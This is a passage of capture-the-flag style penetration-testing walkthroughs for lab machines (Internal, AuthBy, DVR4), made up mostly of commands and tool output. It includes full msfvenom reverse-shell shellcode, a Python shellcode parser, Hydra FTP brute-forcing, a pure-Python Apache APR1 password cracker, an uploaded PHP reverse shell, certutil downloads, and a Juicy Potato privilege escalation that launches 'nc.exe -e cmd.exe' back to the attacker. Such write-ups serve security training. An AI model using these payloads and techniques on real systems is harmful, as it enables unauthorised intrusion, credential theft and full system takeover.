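    """Return (ip, port) baked into a Metasploit x86 reverse_tcp stager, or None if absent."""
    m = SOCKADDR_RE.search(blob)
    if not m:
        return None
    ip = socket.inet_ntoa(m.group("ip"))
    port = struct.unpack("!H", m.group("port"))[0]
    return ip, port


if __name__ == "__main__":
    sc = c_array_to_bytes(SAMPLE_C_ARRAY)
    print(f"{len(sc)} bytes")
    print(to_python_literal(sc))
    print("callback:", find_reverse_tcp_target(sc))
```

Feed the full msfvenom output through `c_array_to_bytes` and compare `len()` against the `Payload size` msfvenom printed; a byte lost while copying shows up there before it shows up as a blue screen.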
### 3. Generate the shellcode
The exploit's payload is hardcoded, so generate replacement shellcode with msfvenom:
```
┌──(chw㉿CHW)-[~]
└─$ msfvenom -p windows/shell/reverse_tcp LHOST=192.168.45.178 LPORT=8888 EXITFUNC=thread -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 375 bytes
Final size of c file: 1605 bytes
unsigned char buf[] =
"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x64\x8b\x52\x30\x89"
"\xe5\x8b\x52\x0c\x8b\x52\x14\x0f\xb7\x4a\x26\x31\xff\x8b"
"\x72\x28\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d"
"\x01\xc7\x49\x75\xef\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01"
"\xd0\x8b\x40\x78\x85\xc0\x74\x4c\x01\xd0\x8b\x48\x18\x8b"
"\x58\x20\x50\x01\xd3\x85\xc9\x74\x3c\x49\x8b\x34\x8b\x01"
"\xd6\x31\xff\x31\xc0\xc1\xcf\x0d\xac\x01\xc7\x38\xe0\x75"
"\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe0\x58\x8b\x58\x24\x01"
"\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01"
"\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58"
"\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d\x68\x33\x32\x00"
"\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8"
"\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80"
"\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x2d\xb2\x68\x02\x00"
"\x22\xb8\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74"
"\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67"
"\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f"
"\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10"
"\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53"
"\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8"
"\x00\x7d\x28\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b"
"\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e"
"\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff"
"\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xe0\x1d\x2a\x0a\x68"
"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";
```

### 4. Edit and run the exploit
Replace the shellcode in the script with the bytes generated above, then run it with a plain `nc` listener:
```
┌──(chw㉿CHW)-[~]
└─$ python2 Internal.py 192.168.133.40
Password for [WORKGROUP\Administrator]:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE

┌──(chw㉿CHW)-[~]
└─$ nc -nvlp 8888
listening on [any] 8888 ...
connect to [192.168.45.178] from (UNKNOWN) [192.168.133.40] 49159
ls
```
>[!Important]
> The connection arrives and dies immediately. This is not a problem with `nc` and Windows console streams: `windows/shell/reverse_tcp` is a *staged* payload. The 375 bytes above are only the stager, which connects back and waits for the handler to send the actual shell stage. `nc` has no stage to send, so the stager reads nothing useful and the thread exits. Either catch it with Metasploit's `multi/handler` configured for the same staged payload (done below), or regenerate with the stageless `windows/shell_reverse_tcp`, which is what the Squid box used with `nc` successfully.

```
┌──(chw㉿CHW)-[~]
└─$ msfconsole
...
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.45.178
LHOST => 192.168.45.178
msf6 exploit(multi/handler) > set LPORT 8888
LPORT => 8888
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.45.178:8888
```
Run `Internal.py` again.

### 5. Shell
```
Shell Banner:
Microsoft Windows [Version 6.0.6001]
-----

C:\Windows\system32>hostname
hostname
internal

C:\Windows\system32>whoami
whoami
nt authority\system
```
> Kernel exploit, so the shell is SYSTEM directly.

### ✅ Get Root FLAG
> Root flag in `C:\Users\Administrator\Desktop`

# Intermediate

# AuthBy
![image](https://hackmd.io/_uploads/Bys4Z76nye.png)

## Solution
### 1. Recon
#### 1.1 Nmap
```
┌──(chw㉿CHW)-[~]
└─$ nmap -sC -sV -T4 -p- 192.168.124.46
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-22 11:51 EDT
Stats: 0:03:11 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 11:54 (0:00:06 remaining)
Stats: 0:03:11 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 100.00% done; ETC: 11:54 (0:00:00 remaining)
Nmap scan report for 192.168.124.46
Host is up (0.11s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           zFTPServer 6.0 build 2011-10-17
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| total 9680
| ----------   1 root     root      5610496 Oct 18  2011 zFTPServer.exe
| ----------   1 root     root           25 Feb 10  2011 UninstallService.bat
| ----------   1 root     root      4284928 Oct 18  2011 Uninstall.exe
| ----------   1 root     root           17 Aug 13  2011 StopService.bat
| ----------   1 root     root           18 Aug 13  2011 StartService.bat
| ----------   1 root     root         8736 Nov 09  2011 Settings.ini
| dr-xr-xr-x   1 root     root          512 Mar 22 22:54 log
| ----------   1 root     root         2275 Aug 08  2011 LICENSE.htm
| ----------   1 root     root           23 Feb 10  2011 InstallService.bat
| dr-xr-xr-x   1 root     root          512 Nov 08  2011 extensions
| dr-xr-xr-x   1 root     root          512 Nov 08  2011 certificates
|_dr-xr-xr-x   1 root     root          512 Aug 03  2024 accounts
242/tcp  open  http          Apache httpd 2.2.21 ((Win32) PHP/5.3.8)
|_http-title: 401 Authorization Required
|_http-server-header: Apache/2.2.21 (Win32) PHP/5.3.8
| http-auth:
| HTTP/1.1 401 Authorization Required\x0D
|_  Basic realm=Qui e nuce nuculeum esse volt, frangit nucem!
3145/tcp open  zftp-admin    zFTPServer admin
3389/tcp open  ms-wbt-server Microsoft Terminal Service
|_ssl-date: 2025-03-22T15:54:35+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=LIVDA
| Not valid before: 2024-08-02T13:17:54
|_Not valid after:  2025-02-01T13:17:54
| rdp-ntlm-info:
|   Target_Name: LIVDA
|   NetBIOS_Domain_Name: LIVDA
|   NetBIOS_Computer_Name: LIVDA
|   DNS_Domain_Name: LIVDA
|   DNS_Computer_Name: LIVDA
|   Product_Version: 6.0.6001
|_  System_Time: 2025-03-22T15:54:30+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```
> FTP (anonymous allowed), zFTPServer admin port, HTTP behind Basic auth, RDP.

Browse to 192.168.124.46:242:\
![image](https://hackmd.io/_uploads/Skp30U2nkx.png)

#### 1.2 FTP
```
┌──(chw㉿CHW)-[~]
└─$ ftp Anonymous@192.168.124.46
Connected to 192.168.124.46
220 zFTPServer v6.0, build 2011-10-17 15:25 ready.
331 User name received, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||2049|)
150 Opening connection for /bin/ls.
total 9680
----------   1 root     root      5610496 Oct 18  2011 zFTPServer.exe
----------   1 root     root           25 Feb 10  2011 UninstallService.bat
----------   1 root     root      4284928 Oct 18  2011 Uninstall.exe
----------   1 root     root           17 Aug 13  2011 StopService.bat
----------   1 root     root           18 Aug 13  2011 StartService.bat
----------   1 root     root         8736 Nov 09  2011 Settings.ini
dr-xr-xr-x   1 root     root          512 Mar 22 22:54 log
----------   1 root     root         2275 Aug 08  2011 LICENSE.htm
----------   1 root     root           23 Feb 10  2011 InstallService.bat
dr-xr-xr-x   1 root     root          512 Nov 08  2011 extensions
dr-xr-xr-x   1 root     root          512 Nov 08  2011 certificates
dr-xr-xr-x   1 root     root          512 Aug 03  2024 accounts
226 Closing data connection.
```
Mirror it locally with `wget`:
```
┌──(chw㉿CHW)-[~]
└─$ wget -r ftp://Anonymous@192.168.124.46
...
No such file ‘acc[anonymous].uac’.
--2025-03-22 12:13:55--  ftp://Anonymous@192.168.124.46/accounts/acc%5Badmin%5D.uac
           => ‘192.168.124.46/accounts/acc[admin].uac’
==> CWD not required.
==> PASV ... done.    ==> RETR acc[admin].uac ...
No such file ‘acc[admin].uac’.
```
> Fails.
>[!Important]
> At first this looked like a client problem (PASV plus the `[` `]` characters in the account file names), so `lftp` was tried as well:
```
┌──(chw㉿CHW)-[~]
└─$ lftp -u anonymous, ftp://192.168.124.46 -e "mirror --verbose --parallel=5 --continue --target-directory ./ftp; quit"
```
> That fails too. On closer inspection it is simply permissions: every file in the anonymous listing has mode `----------` (no read bit at all), so no client can retrieve them. The `accounts` directory holding `acc[admin].uac` and `acc[anonymous].uac` does tell us which FTP accounts exist, though.

### 2. Hydra
Brute-force the FTP login with a default-credentials list:
```
┌──(chw㉿CHW)-[~]
└─$ hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 192.168.124.46 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-23 02:10:52
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 66 login tries, ~5 tries per task
[DATA] attacking ftp://192.168.124.46:21/
[21][ftp] host: 192.168.124.46   login: admin   password: admin
[21][ftp] host: 192.168.124.46   login: anonymous   password: anonymous
[21][ftp] host: 192.168.124.46   login: Admin   password: admin
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-23 02:11:10
```
Connect as admin:
```
┌──(chw㉿CHW)-[~]
└─$ ftp admin@192.168.124.46
Connected to 192.168.124.46.
220 zFTPServer v6.0, build 2011-10-17 15:25 ready.
331 User name received, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||2054|)
150 Opening connection for /bin/ls.
total 3
-r--r--r--   1 root     root           76 Nov 08  2011 index.php
-r--r--r--   1 root     root           45 Nov 08  2011 .htpasswd
-r--r--r--   1 root     root          161 Nov 08  2011 .htaccess
d--x--x--x   1 root     root          512 Mar 23 06:14 ..
d--x--x--x   1 root     root          512 Mar 23 06:14 .
226 Closing data connection.
```
> `index.php`, `.htaccess` and `.htpasswd`: admin's FTP root is the document root of the Basic-auth site on port 242.

Mirror it locally:
```
┌──(chw㉿CHW)-[~]
└─$ wget -r ftp://admin:admin@192.168.124.46

┌──(chw㉿CHW)-[~/192.168.124.46]
└─$ cat index.php
<center><pre>Qui e nuce nuculeum esse volt, frangit nucem!</pre></center>

┌──(chw㉿CHW)-[~/192.168.124.46]
└─$ cat .htpasswd
offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0
```
> The `$apr1$` prefix marks an Apache APR1 (MD5-based) htpasswd hash for the user `offsec`.
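The next step hands the hash to hashcat. To show what hashcat is actually computing in mode 1600, here is an added example (not code from the walkthrough) that reimplements Apache's `$apr1$` scheme in pure Python and runs a small dictionary attack against the `.htpasswd` entry above. `$apr1$` is the md5crypt construction with Apache's own magic string: an initial MD5 over password, magic and salt, a length-dependent mixing step, then 1000 rounds that feed the password, salt and running digest into MD5 in a round-number-dependent order, finished with a custom base64 over a permuted byte order. The hash is the one recovered above; the wordlist is constructed for the example.

```python
"""Apache APR1 (`$apr1$`) password hashing, reimplemented to crack an .htpasswd entry offline.

Added example for the AuthBy walkthrough; not code from the page, which uses
hashcat -m 1600 for this step. Only hashlib is needed.
"""
import hashlib

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$apr1$"

HTPASSWD_LINE = "offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0"   # from the box's .htpasswd
WORDLIST = ["password", "admin", "offsec", "livda", "elite"]       # constructed for the example


def _to64(value, count):
    """md5crypt's base64 variant: least-significant 6 bits first, 'count' characters."""
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def apr1_crypt(password, salt):
    """Return `$apr1$<salt>$<hash>` for password and salt (both bytes; salt is at most 8 chars)."""
    salt = salt[:8]
    # Initial context: password, magic, salt.
    ctx = hashlib.md5(password + MAGIC + salt)
    # Alternate sum md5(pw + salt + pw), fed in once per 16 bytes of password length.
    alt = hashlib.md5(password + salt + password).digest()
    remaining = len(password)
    while remaining > 0:
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    # Bitwise walk over the password length: NUL for a set bit, first password byte otherwise.
    bits = len(password)
    while bits:
        ctx.update(b"\x00" if bits & 1 else password[:1])
        bits >>= 1
    final = ctx.digest()
    # 1000 stretching rounds; what goes in depends on the round number.
    for r in range(1000):
        h = hashlib.md5()
        h.update(password if r & 1 else final)
        if r % 3:
            h.update(salt)
        if r % 7:
            h.update(password)
        h.update(final if r & 1 else password)
        final = h.digest()
    # Encode 16 digest bytes as 22 characters in md5crypt's permuted order.
    encoded = b"".join([
        _to64((final[0] << 16) | (final[6] << 8) | final[12], 4),
        _to64((final[1] << 16) | (final[7] << 8) | final[13], 4),
        _to64((final[2] << 16) | (final[8] << 8) | final[14], 4),
        _to64((final[3] << 16) | (final[9] << 8) | final[15], 4),
        _to64((final[4] << 16) | (final[10] << 8) | final[5], 4),
        _to64(final[11], 2),
    ])
    return (MAGIC + salt + b"$" + encoded).decode()


def parse_htpasswd_line(line):
    """Split `user:$apr1$salt$hash` into (user, salt, full_hash)."""
    user, full = line.strip().split(":", 1)
    if not full.startswith("$apr1$"):
        raise ValueError("not an APR1 hash")
    salt = full.split("$")[2]
    return user, salt, full


def crack(htpasswd_line, wordlist):
    """Return the first candidate whose APR1 hash matches the line, or None."""
    _user, salt, full = parse_htpasswd_line(htpasswd_line)
    for word in wordlist:
        if apr1_crypt(word.encode(), salt.encode()) == full:
            return word
    return None


if __name__ == "__main__":
    print(crack(HTPASSWD_LINE, WORDLIST))
```

At 1000 MD5 rounds per guess this is fine for a short list and hopeless for rockyou with rules, which is why the walkthrough reaches for hashcat; the point of the reimplementation is to see that the salt is public and the only secret is the password.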
Hashcat Hashcat 爆出 offsec 密碼 ``` ┌──(chw㉿CHW)-[~/192.168.124.46] └─$ hashid '$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0' -m Analyzing '$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0' [+] MD5(APR) [Hashcat Mode: 1600] [+] Apache MD5 [Hashcat Mode: 1600] ┌──(chw㉿CHW)-[~/192.168.124.46] └─$ cat AuthBy.hash $apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0 ┌──(chw㉿CHW)-[~/192.168.124.46] └─$ hashcat -m 1600 AuthBy.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force hashcat (v6.2.6) starting ... $apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0:elite ... ``` > 嘗試登入 Http 或 rdp ### 4. Offsec 登入 #### 4.1 登入 RDP ``` ┌──(chw㉿CHW)-[~/192.168.124.46] └─$ rdesktop 192.168.124.46 ``` > RDP 失敗 ![image](https://hackmd.io/_uploads/HyoaqQThkl.png) #### 4.2 登入 HTTP ![image](https://hackmd.io/_uploads/HJMTKXT2yx.png) > 成功,且顯示 index.php 在 ftp 上傳 shell,驗證能否成功顯示 ### 5. Reverse Shell >[!Tip] >🎯 兩種方法 >1. PHP ( wget kali 的 `rev.exe` 並執行) >2. 在 php 直接建 reverse shell 使用現成 [ivan-sincek](https://raw.githubusercontent.com/ivan-sincek/php-reverse-shell/master/src/reverse/php_reverse_shell.php) 寫好的 reverse shell ``` ┌──(chw㉿CHW)-[~/192.168.124.46] └─$ cat chw_revall.php ... echo '<pre>'; // change the host address and/or port number as necessary $sh = new Shell('192.168.45.165', 8888); $sh->run(); unset($sh); // garbage collector requires PHP v5.3.0 or greater // @gc_collect_cycles(); echo '</pre>'; ?> ``` 上傳 FTP Server ``` ┌──(chw㉿CHW)-[~/192.168.124.46] └─$ ftp admin@192.168.124.46 Connected to 192.168.124.46. 220 zFTPServer v6.0, build 2011-10-17 15:25 ready. 331 User name received, need password. Password: 230 User logged in, proceed. Remote system type is UNIX. Using binary mode to transfer files. ftp> put chw_revall.php local: chw_revall.php remote: chw_revall.php 229 Entering Extended Passive Mode (|||2067|) 150 File status okay; about to open data connection. 
100% |**********************************************************************************************| 9408 48.49 MiB/s 00:00 ETA 226 Closing data connection. 9408 bytes sent in 00:00 (30.04 KiB/s) ftp> ls 229 Entering Extended Passive Mode (|||2068|) 150 Opening connection for /bin/ls. total 34 -r--r--r-- 1 root root 76 Nov 08 2011 index.php -r--r--r-- 1 root root 9408 Mar 23 14:22 chw_revall.php -r--r--r-- 1 root root 45 Nov 08 2011 .htpasswd -r--r--r-- 1 root root 161 Nov 08 2011 .htaccess 226 Closing data connection. ``` Kali 開啟監聽 port ``` ┌──(chw㉿CHW)-[~/192.168.124.46] └─$ nc -nvlp 8888 listening on [any] 8888 ... ``` 瀏覽上傳檔案: http://192.168.124.46:242/chw_revall.php \ `curl -u 'offsec:elite' -X GET http://192.168.124.46:242/chw_revall.php` ### 6. 取得 Shell ``` ┌──(chw㉿CHW)-[~/192.168.124.46] └─$ nc -nvlp 8888 listening on [any] 8888 ... connect to [192.168.45.165] from (UNKNOWN) [192.168.124.46] 49159 SOCKET: Shell has connected! PID: 2624 Microsoft Windows [Version 6.0.6001] Copyright (c) 2006 Microsoft Corporation. All rights reserved. 
C:\wamp\bin\apache\Apache2.2.21>whoami livda\apache ``` ### ✅ Get User Flag > 在 `C:\Users\apache\Desktop`找到 User flag ## Privileges Escalation ``` C:\wamp\bin\apache\Apache2.2.21>whoami /groups GROUP INFORMATION ----------------- Group Name Type SID Attributes ==================================== ================ ============ ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\High Mandatory Level Unknown SID type S-1-16-12288 Mandatory group, Enabled by default, Enabled group C:\wamp\bin\apache\Apache2.2.21>systeminfo Host Name: LIVDA OS Name: Microsoftr Windows Serverr 2008 Standard OS Version: 6.0.6001 Service Pack 1 Build 6001 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 92573-OEM-7502905-27565 Original Install Date: 12/19/2009, 11:25:57 AM System Boot Time: 3/23/2025, 12:48:23 AM System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: X86-based PC Processor(s): 1 Processor(s) Installed. 
                           [01]: x64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2650 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT-08:00) Pacific Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,675 MB
Page File: Max Size:       1,985 MB
Page File: Available:      1,555 MB
Page File: In Use:         430 MB
Page File Location(s):     N/A
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           N/A

C:\wamp\bin\apache\Apache2.2.21>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

C:\wamp\bin\apache\Apache2.2.21>whoami /groups

GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes
==================================== ================ ============ ==================================================
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Unknown SID type S-1-16-12288 Mandatory group, Enabled by default, Enabled group
```

> 1. The shell is running as `NT AUTHORITY\SERVICE` (S-1-5-6)
> ![image](https://hackmd.io/_uploads/ry-wGrT3yg.png)
> 2. SeImpersonatePrivilege is held, so PrintSpoofer can be tried

### 7. SigmaPotato

```
┌──(chw㉿CHW)-[~/Desktop/upload_tools]
└─$ wget https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe

┌──(chw㉿CHW)-[~/Desktop/upload_tools]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```

Try PowerShell

```
C:\Windows\System32>dir /s /b C:\powershell.exe
C:\Windows\winsxs\x86_microsoft-windows-powershell-exe_31bf3856ad364e35_6.0.6001.18000_none_6915feb40232a384\powershell.exe

C:\Windows\System32>
C:\Windows\System32>\Windows\winsxs\x86_microsoft-windows-powershell-exe_31bf3856ad364e35_6.0.6001.18000_none_6915feb40232a384\powershell.exe

C:\Windows\System32>powershell
'powershell' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\System32>copy "C:\Windows\winsxs\x86_microsoft-windows-powershell-exe_31bf3856ad364e35_6.0.6001.18000_none_6915feb40232a384\powershell.exe" C:\Windows\System32\
Access is denied.
        0 file(s) copied.
```

> PowerShell cannot be used

```
C:\Windows\System32>wget
'wget' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\System32>iwr
'iwr' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\System32>curl
'curl' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\System32>certutil
CertUtil: -dump command completed successfully.
```

> Only CertUtil is available

Download SigmaPotato.exe

```
C:\Windows\System32>certutil -urlcache -split -f http://192.168.45.165/SigmaPotato.exe SigmaPotato.exe
****  Online  ****
CertUtil: -URLCache command FAILED: 0x80070005 (WIN32: 5)
CertUtil: Access is denied.
```

> The path is not writable; switch to `C:\Users\Public` or `C:\Windows\Temp`

```
C:\Users\Public>certutil -urlcache -split -f http://192.168.45.165/SigmaPotato.exe SigmaPotato.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

C:\Users\Public>dir
 Volume in drive C has no label.
 Volume Serial Number is BCAD-595B

 Directory of C:\Users\Public

03/23/2025  01:45 AM    <DIR>          .
03/23/2025  01:45 AM    <DIR>          ..
03/23/2025  01:44 AM                 0 certutil
01/19/2008  01:45 AM    <DIR>          Documents
01/19/2008  01:45 AM    <DIR>          Downloads
01/19/2008  01:45 AM    <DIR>          Music
01/19/2008  01:45 AM    <DIR>          Pictures
03/23/2025  01:45 AM            63,488 SigmaPotato.exe
01/19/2008  01:45 AM    <DIR>          Videos
               2 File(s)         63,488 bytes
               7 Dir(s)   6,031,769,600 bytes free

C:\Users\Public>.\SigmaPotato "net user chw chw /add"

C:\Users\Public>.\SigmaPotato "net localgroup Administrators chw /add"

C:\Users\Public>net user chw
The user name could not be found.

More help is available by typing NET HELPMSG 2221.
```

> After some research online: `SigmaPotato` does not support Windows 7/2008 R2 (x86/x64), so Juicy-Potato-x86 is needed

### 8. Juicy-Potato-x86

#### 8.1 Download Juicy-Potato-x86.exe

```
C:\Users\Public>certutil -urlcache -split -f http://192.168.45.165/Juicy.Potato.x86.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

C:\Users\Public>dir
 Volume in drive C has no label.
 Volume Serial Number is BCAD-595B

 Directory of C:\Users\Public

03/23/2025  02:27 AM    <DIR>          .
03/23/2025  02:27 AM    <DIR>          ..
03/23/2025  01:44 AM                 0 certutil
01/19/2008  01:45 AM    <DIR>          Documents
01/19/2008  01:45 AM    <DIR>          Downloads
03/23/2025  02:27 AM           263,680 Juicy.Potato.x86.exe
01/19/2008  01:45 AM    <DIR>          Music
01/19/2008  01:45 AM    <DIR>          Pictures
03/23/2025  01:45 AM            63,488 SigmaPotato.exe
01/19/2008  01:45 AM    <DIR>          Videos
               3 File(s)        327,168 bytes
               7 Dir(s)   6,030,557,184 bytes free
```

Juicy-Potato-x86 will also use nc.exe to launch the reverse shell

```
C:\Users\Public>certutil -urlcache -split -f http://192.168.45.165/nc_x86.exe nc.exe
```

#### 8.2 Look up a CLSID

Juicy-Potato-x86 needs a usable CLSID\
[CLSID](https://github.com/ohpe/juicy-potato/tree/master/CLSID/?source=post_page-----96e74b36375a---------------------------------------): `{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}`\
![image](https://hackmd.io/_uploads/H11LS86nye.png)

#### 8.3 Run Juicy-Potato-x86

```
C:\Users\Public>.\Juicy.Potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/cc:\users\Public\nc.exe -e cmd.exe 192.168.45.165 6666" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
Testing {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} 1337
....
[+] authresult 0
{9B1F122C-2982-4e91-AA8B-E071D54F2A4D};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK
```

>`-l 1337`: opens a fake COM listening port (any port that does not collide with the service's TCP port)\
>`-p c:\windows\system32\cmd.exe`: the built-in cmd.exe to execute\
>`-a "/cc:\users\Public\nc.exe -e cmd.exe 192.168.45.165 6666"`: the nc reverse shell
>`-t *`: COM type `*` means the default DCOM authorization methods (LocalService, NetworkService, etc.)\
>`-c CLSID`: the COM CLSID to abuse

(Kali)

```
┌──(chw㉿CHW)-[~]
└─$ nc -nvlp 6666
listening on [any] 6666 ...
connect to [192.168.45.165] from (UNKNOWN) [192.168.124.46] 49360
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
```

>[!Important]
>Later, from other writeups:
>windows server 2008 standard 6001 privilege escalation\
>there is an exploit that can be used directly\
>`searchsploit ms11-046`

### ✅ Get Root FLAG

> The root flag is in `C:\Users\Administrator\Desktop`

# DVR4

![image](https://hackmd.io/_uploads/Bk8f0I631e.png)

## Solution

### 1. Recon

#### 1.1 Nmap

```
┌──(chw㉿CHW)-[~]
└─$ nmap -sC -sV -T4 -p- 192.168.124.179
...
Host is up (0.12s latency).
Not shown: 65507 closed tcp ports (reset)
PORT      STATE    SERVICE        VERSION
22/tcp    open     ssh            Bitvise WinSSHD 8.48 (FlowSsh 8.48; protocol 2.0; non-commercial use)
| ssh-hostkey:
|   3072 21:25:f0:53:b4:99:0f:34:de:2d:ca:bc:5d:fe:20:ce (RSA)
|_  384 e7:96:f3:6a:d8:92:07:5a:bf:37:06:86:0a:31:73:19 (ECDSA)
135/tcp   open     msrpc          Microsoft Windows RPC
139/tcp   open     netbios-ssn    Microsoft Windows netbios-ssn
326/tcp   filtered unknown
445/tcp   open     microsoft-ds?
481/tcp   filtered dvs
637/tcp   filtered lanserver
1953/tcp  filtered rapidbase
3978/tcp  filtered secure-cfg-svr
3998/tcp  filtered dnx
5040/tcp  open     unknown
8080/tcp  open     http-proxy
|_http-title: Argus Surveillance DVR
